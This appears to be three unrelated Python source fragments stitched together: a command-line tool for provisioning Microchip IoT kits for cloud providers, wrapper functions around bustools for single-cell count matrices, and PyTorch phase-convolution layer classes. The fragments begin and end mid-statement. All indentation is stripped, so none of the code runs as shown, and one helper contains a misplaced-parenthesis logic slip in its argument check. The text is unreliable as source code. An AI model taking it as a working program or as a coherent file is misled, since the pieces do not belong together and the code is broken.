# The yaml file might have been customized and the console_only_info handler
# might already have been removed
pass
try:
configfile['root']['handlers'].remove('console_not_info')
except ValueError:
# The yaml file might have been customized and the console_only_info handler
# might already have been removed
pass
else:
# Console logging takes granularity argument from CLI user
configfile['handlers']['console_only_info']['level'] = user_requested_level
configfile['handlers']['console_not_info']['level'] = user_requested_level
# Root logger must be the most verbose of the ALL YAML configurations and the CLI user argument
most_verbose_logging = min(user_requested_level, getattr(logging, configfile['root']['level']))
for handler in configfile['handlers'].keys():
# A filename key
if 'filename' in configfile['handlers'][handler].keys():
level = getattr(logging, configfile['handlers'][handler]['level'])
most_verbose_logging = min(most_verbose_logging, level)
configfile['root']['level'] = most_verbose_logging
dictConfig(configfile)
return
except ScannerError:
# Error while parsing YAML
print("Error parsing logging config file '{}'".format(path))
except KeyError as keyerror:
# Error looking for custom fields in YAML
print("Key {} not found in logging config file".format(keyerror))
else:
# Config specified by environment variable not found
print("Unable to open logging config file '{}'".format(path))
# If all else fails, revert to basic logging at specified level for this application
print("Reverting to basic logging.")
logging.basicConfig(level=user_requested_level)
def peek_cloudprovider():
"""
Provide defaults help text for ciphersuites for specified cloud provider.
"""
cloud = None
for cloud in CLOUD_PROVIDERS:
for arg in sys.argv:
if ((arg.startswith("-c" or arg.startswith("--cloud"))) and arg.endswith(cloud)) or arg == cloud:
return cloud
return "aws"
def main():
"""
Iotprovision main program. Parse out command-line arguments
"""
# All possible actions. The [] at end is to allow no actions as default.
# meaning ACTIONS_DEFAULT will be used. Argparse does not allow to specify multiple choices
# (ACTIONS_DEFAULT) directly as default, and None doesn't work.
ACTIONS_ALL = ["account", "debuggerupgrade", "wincupgrade", "rootcerts", "certs", "provision", "application", []]
# Action(s) to be performed by default (ie if none are explicitly specified)
ACTIONS_DEFAULT = ["account", "wincupgrade", "certs", "provision", "application"]
### The following is to help determine if cloud provider must be specified or not.
# Provisioning actions needing cloud provider to be specified
ACTIONS_NEEDING_CLOUDPROVIDER = ["account", "certs", "provision", "application"]
# Options/arguments that will just print something and exit, not requiring cloud provider
PRINT_ARGS = ["--help", "-h", "help", "-V", "--version", "-R", "--release-info"]
parser = argparse.ArgumentParser(description="Provision an AVR-IoT, PIC-IoT or SAM-IoT kit for a cloud provider",
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
# Action(s) to perform.
parser.add_argument("actions", nargs="*", choices=ACTIONS_ALL,
help=f"Action(s) to perform, if none given, default is [{' '.join(ACTIONS_DEFAULT)}]")
#Options for provisioning
parser.add_argument(
"-c", "--cloud-provider",
# --cloud provider specification is required if:
# - Any command-line argument/option is given (else just print help and exit)
# - AND NOT any of the version/help options given (these print and exit immediately)
# - AND any of the real provisioning actions are specified explicitly
# - OR no actions explictly specified (=> ACTIONS_DEFAULT will be used)
required=(len(sys.argv) > 1
and not [arg for arg in sys.argv if arg in PRINT_ARGS]
and ([action for action in sys.argv if action in ACTIONS_NEEDING_CLOUDPROVIDER]
or not [action for action in sys.argv if action in ACTIONS_ALL])),
help="Cloud provider to provision for",
choices=CLOUD_PROVIDERS)
parser.add_argument(
"-m", "--provision-method",
help="Provisioning method: Microchip sandbox, JITR or MAR (AWS custom account)",
choices=["sandbox", "custom", "jitr", "mar"], default="sandbox")
parser.add_argument(
"-a", "--aws-profile",
type=str, default="default",
help="AWS profile name")
parser.add_argument(
"-P", "--port",
type=str, default=None,
help="Serial port name for communication with kit, only used when not successfully"
" auto-detected")
# Forcing options
parser.add_argument(
"--fca", "--force-ca-certs", action="store_true", dest="force_ca_certs",
help="Force re-creation of CA certificates even if already existing")
parser.add_argument(
"--fdev", "--force-device-certs", action="store_true", dest="force_device_cert",
help="Force re-creation of device and signer certificate even if already existing")
parser.add_argument(
"--faws", "--force-aws-cloudformation", action="store_true", dest="force_aws_cloudformation",
help="Force re-creation of AWS cloudformation stack even if already existing")
parser.add_argument(
"--fwinc", "--force-wincupgrade", action="store_true", dest="force_wincupgrade",
help="Force WINC upgrade even if not required for provisioning")
parser.add_argument(
"--sprov", "--skip-program-provision-firmware", action="store_true", dest="skip_program_provision_firmware",
help="Skip programming provision firmware. NOTE: This is an advanced option and may break the process")
# Options for creation of chain-of-trust (custom provisioning)
parser.add_argument("--org", "--organization-name", type=str,
help="CA certificate issuer organization name",
required=False, default=DEFAULT_ORGANIZATION_NAME,
dest="organization_name")
parser.add_argument("--rcn", "--root-common-name", type=str,
help="Root CA certificate issuer common name",
required=False, default=DEFAULT_ROOT_COMMON_NAME,
dest="root_common_name")
parser.add_argument("--scn", "--signer-common-name", type=str,
help="Signer CA CSR common name",
required=False, default=DEFAULT_SIGNER_COMMON_NAME,
dest="signer_common_name")
# Options to manage WINC root certificate storage, used with 'rootcerts' action
# TODO: Should perhaps use this for cellular also, for HTTPS?
rootcert_opts = parser.add_mutually_exclusive_group()
rootcert_opts.add_argument("--irc", "--install-root-certs", type=str,
help="Install all certificate files in a folder in WINC root certificate storage",
dest="install_root_certs")
rootcert_opts.add_argument("--rrc", "--restore-root-certs", choices=["backup", "factory"],
help="Restore WINC root certificates from backup or factory defaults",
dest="restore_root_certs")
# WiFi setup options for demo application
parser.add_argument(
"--ssid", "--wifi-ssid", dest="wifi_ssid",
type=str, help="SSID for wifi connection")
parser.add_argument(
"--psk", "--wifi-psk", dest="wifi_psk",
type=str, default="", help="PSK (password) for wifi connection")
parser.add_argument(
"--auth", "--wifi-auth", dest="wifi_auth",
default="wpa-psk", choices=WIFI_AUTHS.keys(),
help="wifi authentication mechanism")
# Cellular options. Cellular kit is auto-detected in provisioner.
# All Cellular-only options should have a long option name STARTING WITH
# "--cellular-" to be able to warn about incorrect use (if the selected board
# is not a Cellular kit)
# TODO: Should there be an option to force Cellular provisioning even when not auto-detected?
#parser.add_argument(
# "--fcellular", "--cellular-force", action="store_true", dest="cellular_force",
# help="Force Cellular provisioning even when Cellular kit not auto-detected")
# As of now, we don't support any cellular specific options.
# Misc options
parser.add_argument("-s", "--serialnumber", type=str,
help="USB serial number of the unit to provision")
parser.add_argument("--verify", help="verify after write from file", action="store_true")
parser.add_argument("-v", "--verbose",
default="info",
choices=['debug', 'info', 'warning', 'error', 'critical'],
help="Logging verbosity/severity level")
parser.add_argument("-V", "--version", action="store_true",
help="Print iotprovision version number and exit")
parser.add_argument("-R", "--release-info", action="store_true",
help="Print iotprovision release details and exit")
args = parser.parse_args()
# If no actions were specified, use default set
if not args.actions:
args.actions | |
command += [bus_path]
run_executable(command)
return {'bus': out_path}
@validate_files(pre=False)
def bustools_count(
bus_path,
out_prefix,
t2g_path,
ecmap_path,
txnames_path,
tcc=False,
mm=False
):
"""Runs `bustools count`.
:param bus_path: path to BUS file to correct
:type bus_path: str
:param out_prefix: prefix of the output files to generate
:type out_prefix: str
:param t2g_path: path to output transcript-to-gene mapping
:type t2g_path: str
:param ecmap_path: path to ecmap file, as generated by `kallisto bus`
:type ecmap_path: str
:param txnames_path: path to transcript names file, as generated by `kallisto bus`
:type txnames_path: str
:param tcc: whether to generate a TCC matrix instead of a gene count matrix,
defaults to `False`
:type tcc: bool, optional
:param mm: whether to include BUS records that pseudoalign to multiple genes,
defaults to `False`
:type mm: bool, optional
:return: dictionary containing path to generated index
:rtype: dict
"""
logger.info(
'Generating count matrix {} from BUS file {}'.format(
out_prefix, bus_path
)
)
command = [get_bustools_binary_path(), 'count']
command += ['-o', out_prefix]
command += ['-g', t2g_path]
command += ['-e', ecmap_path]
command += ['-t', txnames_path]
if not tcc:
command += ['--genecounts']
if mm:
command += ['--multimapping']
command += [bus_path]
run_executable(command)
return {
'mtx':
'{}.mtx'.format(out_prefix),
'ec' if tcc else 'genes':
'{}.ec.txt'.format(out_prefix)
if tcc else '{}.genes.txt'.format(out_prefix),
'barcodes':
'{}.barcodes.txt'.format(out_prefix),
}
@validate_files(pre=False)
def bustools_capture(
bus_path,
out_path,
capture_path,
ecmap_path,
txnames_path,
capture_type='transcripts'
):
"""Runs `bustools capture`.
:param bus_path: path to BUS file to capture
:type bus_path: str
:param out_path: path to BUS file to generate
:type out_path: str
:param capture_path: path transcripts-to-capture list
:type capture_path: str
:param ecmap_path: path to ecmap file, as generated by `kallisto bus`
:type ecmap_path: str
:param txnames_path: path to transcript names file, as generated by `kallisto bus`
:type txnames_path: str
:param capture_type: the type of information in the capture list.
can be one of `transcripts`, `umis`, `barcode`.
:type capture_type: str
:return: dictionary containing path to generated index
:rtype: dict
"""
logger.info(
'Capturing records from BUS file {} to {} with capture list {}'.format(
bus_path, out_path, capture_path
)
)
command = [get_bustools_binary_path(), 'capture']
command += ['-o', out_path]
command += ['-c', capture_path]
command += ['-e', ecmap_path]
command += ['-t', txnames_path]
command += ['--complement']
command += ['--{}'.format(capture_type)]
command += [bus_path]
run_executable(command)
return {'bus': out_path}
@validate_files(pre=False)
def bustools_whitelist(bus_path, out_path):
"""Runs `bustools whitelist`.
:param bus_path: path to BUS file generate the whitelist from
:type bus_path: str
:param out_path: path to output whitelist
:type out_path: str
:return: dictionary containing path to generated index
:rtype: dict
"""
logger.info(
'Generating whitelist {} from BUS file {}'.format(out_path, bus_path)
)
command = [
get_bustools_binary_path(), 'whitelist', '-o', out_path, bus_path
]
run_executable(command)
return {'whitelist': out_path}
def write_smartseq_batch(fastq_pairs, cell_ids, out_path):
"""Write a 3-column TSV specifying batch information for Smart-seq reads.
This file is required to use `kallisto pseudo` on multiple samples (= cells).
:param fastq_pairs: list of pairs of FASTQs
:type fastq_pairs: list
:param cell_ids: list of cell IDs
:type cell_ids: list
:param out_path: path to batch file to output
:type out_path: str
:return: dictionary of written batch file
:rtype: dict
"""
logger.info(f'Writing batch definition TSV to {out_path}')
with open(out_path, 'w') as f:
for cell_id, (fastq_1, fastq_2) in zip(cell_ids, fastq_pairs):
f.write(f'{cell_id}\t{fastq_1}\t{fastq_2}\n')
return {'batch': out_path}
def matrix_to_cellranger(
matrix_path, barcodes_path, genes_path, t2g_path, out_dir
):
"""Convert bustools count matrix to cellranger-format matrix.
:param matrix_path: path to matrix
:type matrix_path: str
:param barcodes_path: list of paths to barcodes.txt
:type barcodes_path: str
:param genes_path: path to genes.txt
:type genes_path: str
:param t2g_path: path to transcript-to-gene mapping
:type t2g_path: str
:param out_dir: path to output matrix
:type out_dir: str
:return: dictionary of matrix files
:rtype: dict
"""
make_directory(out_dir)
logger.info(f'Writing matrix in cellranger format to {out_dir}')
cr_matrix_path = os.path.join(out_dir, CELLRANGER_MATRIX)
cr_barcodes_path = os.path.join(out_dir, CELLRANGER_BARCODES)
cr_genes_path = os.path.join(out_dir, CELLRANGER_GENES)
# Cellranger outputs genes x cells matrix
mtx = scipy.io.mmread(matrix_path)
scipy.io.mmwrite(cr_matrix_path, mtx.T, field='integer')
with open(barcodes_path, 'r') as f, open(cr_barcodes_path, 'w') as out:
for line in f:
if line.isspace():
continue
out.write(f'{line.strip()}-1\n')
# Get all (available) gene names
gene_to_name = {}
with open(t2g_path, 'r') as f:
for line in f:
if line.isspace():
continue
split = line.strip().split('\t')
if len(split) > 2:
gene_to_name[split[1]] = split[2]
with open(genes_path, 'r') as f, open(cr_genes_path, 'w') as out:
for line in f:
if line.isspace():
continue
gene = line.strip()
gene_name = gene_to_name.get(gene, gene)
out.write(f'{gene}\t{gene_name}\n')
return {
'mtx': cr_matrix_path,
'barcodes': cr_barcodes_path,
'genes': cr_genes_path
}
def convert_matrix(
counts_dir,
matrix_path,
barcodes_path,
genes_path=None,
ec_path=None,
t2g_path=None,
txnames_path=None,
name='gene',
loom=False,
h5ad=False,
tcc=False,
threads=8,
):
"""Convert a gene count or TCC matrix to loom or h5ad.
:param counts_dir: path to counts directory
:type counts_dir: str
:param matrix_path: path to matrix
:type matrix_path: str
:param barcodes_path: list of paths to barcodes.txt
:type barcodes_path: str
:param genes_path: path to genes.txt, defaults to `None`
:type genes_path: str, optional
:param ec_path: path to ec.txt, defaults to `None`
:type ec_path: str, optional
:param t2g_path: path to transcript-to-gene mapping. If this is provided,
the third column of the mapping is appended to the
anndata var, defaults to `None`
:type t2g_path: str, optional
:param txnames_path: path to transcripts.txt, defaults to `None`
:type txnames_path: str, optional
:param name: name of the columns, defaults to "gene"
:type name: str, optional
:param loom: whether to generate loom file, defaults to `False`
:type loom: bool, optional
:param h5ad: whether to generate h5ad file, defaults to `False`
:type h5ad: bool, optional
:param tcc: whether the matrix is a TCC matrix, defaults to `False`
:type tcc: bool, optional
:param threads: number of threads to use, defaults to `8`
:type threads: int, optional
:return: dictionary of generated files
:rtype: dict
"""
results = {}
logger.info('Reading matrix {}'.format(matrix_path))
adata = import_tcc_matrix_as_anndata(
matrix_path, barcodes_path, ec_path, txnames_path, threads=threads
) if tcc else import_matrix_as_anndata(
matrix_path, barcodes_path, genes_path, t2g_path=t2g_path, name=name
)
if loom:
loom_path = os.path.join(counts_dir, '{}.loom'.format(ADATA_PREFIX))
logger.info('Writing matrix to loom {}'.format(loom_path))
adata.write_loom(loom_path)
results.update({'loom': loom_path})
if h5ad:
h5ad_path = os.path.join(counts_dir, '{}.h5ad'.format(ADATA_PREFIX))
logger.info('Writing matrix to h5ad {}'.format(h5ad_path))
adata.write(h5ad_path)
results.update({'h5ad': h5ad_path})
return results
def convert_matrices(
counts_dir,
matrix_paths,
barcodes_paths,
genes_paths=None,
ec_paths=None,
t2g_path=None,
txnames_path=None,
name='gene',
loom=False,
h5ad=False,
nucleus=False,
tcc=False,
threads=8,
):
"""Convert a gene count or TCC matrix to loom or h5ad.
:param counts_dir: path to counts directory
:type counts_dir: str
:param matrix_paths: list of paths to matrices
:type matrix_paths: list
:param barcodes_paths: list of paths to barcodes.txt
:type barcodes_paths: list
:param genes_paths: list of paths to genes.txt, defaults to `None`
:type genes_paths: list, optional
:param ec_paths: list of path to ec.txt, defaults to `None`
:type ec_paths: list, optional
:param t2g_path: path to transcript-to-gene mapping. If this is provided,
the third column of the mapping is appended to the
anndata var, defaults to `None`
:type t2g_path: str, optional
:param txnames_path: list of paths to transcripts.txt, defaults to `None`
:type txnames_path: str, optional
:param name: name of the columns, defaults to "gene"
:type name: str, optional
:param loom: whether to generate loom file, defaults to `False`
:type loom: bool, optional
:param h5ad: whether to generate h5ad file, defaults to `False`
:type h5ad: bool, optional
:param nucleus: whether the matrices contain single nucleus counts, defaults to `False`
:type nucleus: bool, optional
:param tcc: whether the matrix is a TCC matrix, defaults to `False`
:type tcc: bool, optional
:param threads: number of threads to use, defaults to `8`
:type threads: int, optional
:return: dictionary of generated files
:rtype: dict
"""
results = {}
adatas = []
matrix_paths = matrix_paths or []
barcodes_paths = barcodes_paths or []
genes_paths = genes_paths or []
ec_paths = ec_paths or []
for matrix_path, barcodes_path, genes_ec_path in zip(
matrix_paths, barcodes_paths, ec_paths
if not genes_paths or None in genes_paths else genes_paths):
logger.info('Reading matrix {}'.format(matrix_path))
adatas.append(
import_tcc_matrix_as_anndata(
matrix_path,
barcodes_path,
genes_ec_path,
txnames_path,
threads=threads
) if tcc else import_matrix_as_anndata(
matrix_path,
barcodes_path,
genes_ec_path,
t2g_path=t2g_path,
name=name
)
)
logger.info('Combining matrices')
adata = sum_anndatas(*adatas) if nucleus else overlay_anndatas(*adatas)
if loom:
loom_path = os.path.join(counts_dir, '{}.loom'.format(ADATA_PREFIX))
logger.info('Writing matrices to loom {}'.format(loom_path))
adata.write_loom(loom_path)
results.update({'loom': loom_path})
if h5ad:
h5ad_path = os.path.join(counts_dir, '{}.h5ad'.format(ADATA_PREFIX))
logger.info('Writing matrices to h5ad {}'.format(h5ad_path))
adata.write(h5ad_path)
results.update({'h5ad': h5ad_path})
return results
def filter_with_bustools(
bus_path,
ecmap_path,
txnames_path,
t2g_path,
whitelist_path,
filtered_bus_path,
counts_prefix=None,
tcc=False,
mm=False,
kite=False,
temp_dir='tmp',
threads=8,
memory='4G',
count=True,
loom=False,
h5ad=False,
cellranger=False
):
"""Generate filtered count matrices with bustools.
:param bus_path: path to sorted, corrected, sorted BUS file
:type | |
<reponame>antsfamily/torchtool<filename>torchlib/module/layers/phase_convolution.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Date : 2019-11-07 17:00:48
# @Author : <NAME> (<EMAIL>)
# @Link : http://iridescent.ink
# @Version : $1.0$
import torch as th
import torch.nn.functional as F
class PhaseConv1d(th.nn.Module):
def __init__(self, in_channels, out_channels, kernel_size=3, stride=1, padding=0,
dilation=1, groups=1, bias=None, padding_mode='zeros'):
super(PhaseConv1d, self).__init__()
self.weight = th.nn.Parameter(
th.zeros(out_channels, int(in_channels / groups), kernel_size))
if (bias is None) or (not bias):
self.bias = None
else:
self.bias = th.nn.Parameter(th.zeros(out_channels, 2))
self.stride = stride
self.padding = padding
self.dilation = dilation
self.groups = groups
def forward(self, x):
weight = th.exp(1j * self.weight)
weight = th.fft.ifft(weight, dim=-1)
weight = th.view_as_real(weight)
if self.bias is None:
x = th.stack((F.conv1d(x[..., 0], weight[..., 0], bias=self.bias, stride=self.stride, padding=self.padding, dilation=self.dilation, groups=self.groups),
F.conv1d(x[..., 1], weight[..., 1], bias=self.bias, stride=self.stride, padding=self.padding, dilation=self.dilation, groups=self.groups)), dim=-1)
else:
x = th.stack((F.conv1d(x[..., 0], weight[..., 0], bias=self.bias[..., 0], stride=self.stride, padding=self.padding, dilation=self.dilation, groups=self.groups),
F.conv1d(x[..., 1], weight[..., 1], bias=self.bias[..., 1], stride=self.stride, padding=self.padding, dilation=self.dilation, groups=self.groups)), dim=-1)
return x
class PhaseConv2d(th.nn.Module):
def __init__(self, in_channels, out_channels, kernel_size=3, stride=1, padding=0,
dilation=1, groups=1, bias=None, padding_mode='zeros'):
super(PhaseConv2d, self).__init__()
if type(kernel_size) is int:
kernel_size = [kernel_size] * 2
self.weight = th.nn.Parameter(th.zeros(out_channels, int(
in_channels / groups), kernel_size[0], kernel_size[1]))
if (bias is None) or (not bias):
self.bias = None
else:
self.bias = th.nn.Parameter(th.zeros(out_channels, 2))
self.stride = stride
self.padding = padding
self.dilation = dilation
self.groups = groups
def forward(self, x):
weight = th.exp(1j * self.weight)
weight = th.fft.ifft(weight, dim=-1)
weight = th.fft.ifft(weight, dim=-2)
weight = th.view_as_real(weight)
if self.bias is None:
x = th.stack((F.conv2d(x[..., 0], weight[..., 0], bias=self.bias, stride=self.stride, padding=self.padding, dilation=self.dilation, groups=self.groups),
F.conv2d(x[..., 1], weight[..., 1], bias=self.bias, stride=self.stride, padding=self.padding, dilation=self.dilation, groups=self.groups)), dim=-1)
else:
x = th.stack((F.conv2d(x[..., 0], weight[..., 0], bias=self.bias[..., 0], stride=self.stride, padding=self.padding, dilation=self.dilation, groups=self.groups),
F.conv2d(x[..., 1], weight[..., 1], bias=self.bias[..., 1], stride=self.stride, padding=self.padding, dilation=self.dilation, groups=self.groups)), dim=-1)
return x
class ComplexPhaseConv1d(th.nn.Module):
def __init__(self, in_channels, out_channels, kernel_size=3, stride=1, padding=0,
dilation=1, groups=1, bias=None, padding_mode='zeros'):
super(ComplexPhaseConv1d, self).__init__()
self.weight = th.nn.Parameter(
th.zeros(out_channels, int(in_channels / groups), kernel_size))
if (bias is None) or (not bias):
self.bias = None
else:
self.bias = th.nn.Parameter(th.zeros(out_channels, 2))
self.stride = stride
self.padding = padding
self.dilation = dilation
self.groups = groups
def forward(self, x):
weight = th.exp(1j * self.weight)
weight = th.fft.ifft(weight, dim=-1)
weight = th.view_as_real(weight)
if self.bias is None:
x = th.stack((F.conv1d(x[..., 0], weight[..., 0], bias=self.bias, stride=self.stride, padding=self.padding, dilation=self.dilation, groups=self.groups) -
F.conv1d(x[..., 1], weight[..., 1], bias=self.bias, stride=self.stride,
padding=self.padding, dilation=self.dilation, groups=self.groups),
F.conv1d(x[..., 1], weight[..., 0], bias=self.bias, stride=self.stride, padding=self.padding, dilation=self.dilation, groups=self.groups) +
F.conv1d(x[..., 0], weight[..., 1], bias=self.bias, stride=self.stride,
padding=self.padding, dilation=self.dilation, groups=self.groups)
), dim=-1)
else:
x = th.stack((F.conv1d(x[..., 0], weight[..., 0], bias=self.bias[..., 0], stride=self.stride, padding=self.padding, dilation=self.dilation, groups=self.groups) -
F.conv1d(x[..., 1], weight[..., 1], bias=self.bias[..., 1], stride=self.stride,
padding=self.padding, dilation=self.dilation, groups=self.groups),
F.conv1d(x[..., 1], weight[..., 0], bias=self.bias[..., 0], stride=self.stride, padding=self.padding, dilation=self.dilation, groups=self.groups) +
F.conv1d(x[..., 0], weight[..., 1], bias=self.bias[..., 1], stride=self.stride,
padding=self.padding, dilation=self.dilation, groups=self.groups)
), dim=-1)
return x
class ComplexPhaseConv2d(th.nn.Module):
def __init__(self, in_channels, out_channels, kernel_size=3, stride=1, padding=0,
dilation=1, groups=1, bias=None, padding_mode='zeros'):
super(ComplexPhaseConv2d, self).__init__()
if type(kernel_size) is int:
kernel_size = [kernel_size] * 2
self.weight = th.nn.Parameter(th.zeros(out_channels, int(in_channels / groups), kernel_size[0], kernel_size[1]))
if (bias is None) or (not bias):
self.bias = None
else:
self.bias = th.nn.Parameter(th.zeros(out_channels, 2))
self.stride = stride
self.padding = padding
self.dilation = dilation
self.groups = groups
def forward(self, x):
weight = th.exp(1j * self.weight)
weight = th.fft.ifft(weight, dim=-1)
weight = th.fft.ifft(weight, dim=-2)
weight = th.view_as_real(weight)
if self.bias is None:
x = th.stack((F.conv2d(x[..., 0], weight[..., 0], bias=self.bias, stride=self.stride, padding=self.padding, dilation=self.dilation, groups=self.groups) -
F.conv2d(x[..., 1], weight[..., 1], bias=self.bias, stride=self.stride,
padding=self.padding, dilation=self.dilation, groups=self.groups),
F.conv2d(x[..., 1], weight[..., 0], bias=self.bias, stride=self.stride, padding=self.padding, dilation=self.dilation, groups=self.groups) +
F.conv2d(x[..., 0], weight[..., 1], bias=self.bias, stride=self.stride,
padding=self.padding, dilation=self.dilation, groups=self.groups)
), dim=-1)
else:
x = th.stack((F.conv2d(x[..., 0], weight[..., 0], bias=self.bias[..., 0], stride=self.stride, padding=self.padding, dilation=self.dilation, groups=self.groups) -
F.conv2d(x[..., 1], weight[..., 1], bias=self.bias[..., 1], stride=self.stride,
padding=self.padding, dilation=self.dilation, groups=self.groups),
F.conv2d(x[..., 1], weight[..., 0], bias=self.bias[..., 0], stride=self.stride, padding=self.padding, dilation=self.dilation, groups=self.groups) +
F.conv2d(x[..., 0], weight[..., 1], bias=self.bias[..., 1], stride=self.stride,
padding=self.padding, dilation=self.dilation, groups=self.groups)
), dim=-1)
return x
class PhaseConvTranspose1d(th.nn.Module):
def __init__(self, in_channels, out_channels, kernel_size, stride=1, padding=0,
output_padding=0, groups=1, bias=None, dilation=1, padding_mode='zeros'):
super(PhaseConvTranspose1d, self).__init__()
self.weight = th.nn.Parameter(th.zeros(in_channels, int(out_channels / groups), kernel_size))
if (bias is None) or (not bias):
self.bias = None
else:
self.bias = th.nn.Parameter(th.zeros(out_channels, 2))
self.stride = stride
self.padding = padding
self.output_padding = output_padding
self.dilation = dilation
self.groups = groups
def forward(self, x):
weight = th.exp(1j * self.weight)
weight = th.fft.ifft(weight, dim=-1)
weight = th.view_as_real(weight)
if self.bias is None:
x = th.stack((F.conv_transpose1d(x[..., 0], weight[..., 0], bias=self.bias, stride=self.stride,
padding=self.padding, output_padding=self.output_padding, groups=self.groups, dilation=self.dilation),
F.conv_transpose1d(x[..., 1], weight[..., 1], bias=self.bias, stride=self.stride,
padding=self.padding, output_padding=self.output_padding, groups=self.groups, dilation=self.dilation)), dim=-1)
else:
x = th.stack((F.conv_transpose1d(x[..., 0], weight[..., 0], bias=self.bias[..., 0], stride=self.stride,
padding=self.padding, output_padding=self.output_padding, groups=self.groups, dilation=self.dilation),
F.conv_transpose1d(x[..., 1], weight[..., 1], bias=self.bias[..., 1], stride=self.stride,
padding=self.padding, output_padding=self.output_padding, groups=self.groups, dilation=self.dilation)), dim=-1)
return x
class PhaseConvTranspose2d(th.nn.Module):
def __init__(self, in_channels, out_channels, kernel_size, stride=1, padding=0,
output_padding=0, groups=1, bias=None, dilation=1, padding_mode='zeros'):
super(PhaseConvTranspose2d, self).__init__()
if type(kernel_size) is int:
kernel_size = [kernel_size] * 2
self.weight = th.nn.Parameter(th.zeros(in_channels, int(out_channels / groups), kernel_size[0], kernel_size[1]))
if (bias is None) or (not bias):
self.bias = None
else:
self.bias = th.nn.Parameter(th.zeros(out_channels, 2))
self.stride = stride
self.padding = padding
self.output_padding = output_padding
self.dilation = dilation
self.groups = groups
def forward(self, x):
weight = th.exp(1j * self.weight)
weight = th.fft.ifft(weight, dim=-1)
weight = th.fft.ifft(weight, dim=-2)
weight = th.view_as_real(weight)
if self.bias is None:
x = th.stack((F.conv_transpose2d(x[..., 0], weight[..., 0], bias=self.bias, stride=self.stride,
padding=self.padding, output_padding=self.output_padding, groups=self.groups, dilation=self.dilation),
F.conv_transpose2d(x[..., 1], weight[..., 1], bias=self.bias, stride=self.stride,
padding=self.padding, output_padding=self.output_padding, groups=self.groups, dilation=self.dilation)), dim=-1)
else:
x = th.stack((F.conv_transpose2d(x[..., 0], weight[..., 0], bias=self.bias[..., 0], stride=self.stride,
padding=self.padding, output_padding=self.output_padding, groups=self.groups, dilation=self.dilation),
F.conv_transpose2d(x[..., 1], weight[..., 1], bias=self.bias[..., 1], stride=self.stride,
padding=self.padding, output_padding=self.output_padding, groups=self.groups, dilation=self.dilation)), dim=-1)
return x
class ComplexPhaseConvTranspose1d(th.nn.Module):
def __init__(self, in_channels, out_channels, kernel_size, stride=1, padding=0,
output_padding=0, groups=1, bias=None, dilation=1, padding_mode='zeros'):
super(ComplexPhaseConvTranspose1d, self).__init__()
self.weight = th.nn.Parameter(th.zeros(in_channels, int(out_channels / groups), kernel_size))
if (bias is None) or (not bias):
self.bias = None
else:
self.bias = th.nn.Parameter(th.zeros(out_channels, 2))
self.stride = stride
self.padding = padding
self.output_padding = output_padding
self.dilation = dilation
self.groups = groups
def forward(self, x):
weight = th.exp(1j * self.weight)
weight = th.fft.ifft(weight, dim=-1)
weight = th.view_as_real(weight)
if self.bias is None:
x = th.stack((F.conv_transpose1d(x[..., 0], weight[..., 0], bias=self.bias, stride=self.stride,
padding=self.padding, output_padding=self.output_padding, groups=self.groups, dilation=self.dilation) -
F.conv_transpose1d(x[..., 1], weight[..., 1], bias=self.bias, stride=self.stride,
padding=self.padding, output_padding=self.output_padding, groups=self.groups, dilation=self.dilation),
F.conv_transpose1d(x[..., 1], weight[..., 0], bias=self.bias, stride=self.stride,
padding=self.padding, output_padding=self.output_padding, groups=self.groups, dilation=self.dilation) +
F.conv_transpose1d(x[..., 0], weight[..., 1], bias=self.bias, stride=self.stride,
padding=self.padding, output_padding=self.output_padding, groups=self.groups, dilation=self.dilation)), dim=-1)
else:
x = th.stack((F.conv_transpose1d(x[..., 0], weight[..., 0], bias=self.bias[..., 0], stride=self.stride,
padding=self.padding, output_padding=self.output_padding, groups=self.groups, dilation=self.dilation) -
F.conv_transpose1d(x[..., 1], weight[..., 1], bias=self.bias[..., 1], stride=self.stride,
padding=self.padding, output_padding=self.output_padding, groups=self.groups, dilation=self.dilation),
F.conv_transpose1d(x[..., 1], weight[..., 0], bias=self.bias[..., 0], stride=self.stride,
padding=self.padding, output_padding=self.output_padding, groups=self.groups, dilation=self.dilation) +
F.conv_transpose1d(x[..., 0], weight[..., 1], bias=self.bias[..., 1], stride=self.stride,
padding=self.padding, output_padding=self.output_padding, groups=self.groups, dilation=self.dilation)), dim=-1)
return x
class ComplexPhaseConvTranspose2d(th.nn.Module):
def __init__(self, in_channels, out_channels, kernel_size, stride=1, padding=0,
output_padding=0, groups=1, bias=None, dilation=1, padding_mode='zeros'):
super(ComplexPhaseConvTranspose2d, self).__init__()
if type(kernel_size) is int:
kernel_size = [kernel_size] * 2
self.weight = th.nn.Parameter(th.zeros(in_channels, int(out_channels / groups), kernel_size[0], kernel_size[1]))
if (bias is None) or (not bias):
self.bias = None
else:
self.bias = th.nn.Parameter(th.zeros(out_channels, 2))
self.stride = stride
self.padding = padding
self.output_padding = output_padding
self.dilation = dilation
self.groups = groups
def forward(self, x):
weight = th.exp(1j * self.weight)
weight = th.fft.ifft(weight, dim=-1)
weight = th.fft.ifft(weight, dim=-2)
weight = th.view_as_real(weight)
if self.bias is None:
x = th.stack((F.conv_transpose2d(x[..., 0], weight[..., 0], bias=self.bias, stride=self.stride,
padding=self.padding, output_padding=self.output_padding, groups=self.groups, dilation=self.dilation) -
F.conv_transpose2d(x[..., 1], weight[..., 1], bias=self.bias, stride=self.stride,
padding=self.padding, output_padding=self.output_padding, groups=self.groups, dilation=self.dilation),
F.conv_transpose2d(x[..., 1], weight[..., 0], bias=self.bias, stride=self.stride,
padding=self.padding, output_padding=self.output_padding, groups=self.groups, dilation=self.dilation) +
F.conv_transpose2d(x[..., 0], weight[..., 1], bias=self.bias, stride=self.stride,
padding=self.padding, output_padding=self.output_padding, groups=self.groups, dilation=self.dilation)), dim=-1)
else:
x = th.stack((F.conv_transpose2d(x[..., 0], weight[..., 0], bias=self.bias[..., 0], stride=self.stride,
padding=self.padding, output_padding=self.output_padding, groups=self.groups, dilation=self.dilation) -
F.conv_transpose2d(x[..., 1], weight[..., 1], bias=self.bias[..., 1], stride=self.stride,
padding=self.padding, output_padding=self.output_padding, groups=self.groups, dilation=self.dilation),
F.conv_transpose2d(x[..., 1], weight[..., 0], bias=self.bias[..., 0], stride=self.stride,
padding=self.padding, output_padding=self.output_padding, groups=self.groups, dilation=self.dilation) +
F.conv_transpose2d(x[..., 0], weight[..., 1], bias=self.bias[..., 1], stride=self.stride,
padding=self.padding, output_padding=self.output_padding, groups=self.groups, dilation=self.dilation)), dim=-1)
return x
if __name__ == '__main__':
import torch as th
device = th.device('cuda:0')
